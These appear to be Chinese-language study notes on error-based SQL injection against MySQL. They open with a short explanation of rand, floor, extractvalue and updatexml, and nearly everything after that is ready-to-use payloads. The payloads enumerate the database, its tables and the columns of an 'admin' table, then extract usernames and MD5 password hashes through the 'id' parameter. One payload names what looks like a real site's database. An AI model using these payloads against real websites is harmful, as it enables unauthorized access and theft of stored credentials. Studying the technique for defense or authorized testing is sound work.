select rand(0) from hackbiao;
rand(0):生成以0开头的随机数,生成的数量与字段下数据的条数相等。如果i没有这个地段的话,就会自己形成一个新的字段打印出来。
grouip by在进行排序的时候,会生成一个虚拟机的表进行排序,但是它不会打印出来
select username,count(username)x from hackbiao group by username;
向下取整,例如0.9=0
select floor(rand(0)*2)x from hackbiao;
extractvalue(1,2)
#1:对象 2:路径
#2原本要写的是路径,但是如果路径(XPATH)不对的话,就要把我们要写的sql语句带进去执行,然后同报错信息一起呈现出来
updatexml(1,2,3)
#1:对象 2:路径 3:修改内容
#跟extractvule一样,当2的路径错了的时候,就会把我们的sql语句带进去执行,然后同报错信息一起显示出来
查询数据库
id=12 and updatexml(1,concat(0x7e,(select database()),0x7e),1)
id=12 and updatexml(1,concat(select group_concat(table_name) from information_schema.tables where table_schema=database()),1)
查询数据表
id=130 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)
查询表下的字段(admin表下)
id=130 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='admin'),0x7e),1)
读取数据
id=130 and updatexml(1,concat(0x7e,(select group_concat(username,'.........',password) from admin),0x7e),1)
这里是可以看到回显数据是不完整的,看这个感觉就是32位的md5加密。
用长度验证一下猜想,果然是32位。具体数值用substring函数就可以读取了
id=130 and updatexml(1,concat(0x7e,(select password from admin where length(password)=32),0x7e),1)
读取数据库
id=12 and extractvalue(1,concat(0x7e,(select database()),0x7e))
读取数据表
id=12 and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='qdm123287303_db'),0x7e))
读取数据
id=130 and extractvalue(1,concat(0x7e,(select password from admin),0x7e))
id=130 and extractvalue(1,concat(0x7e,substring((select password from admin),30,10),0x7e))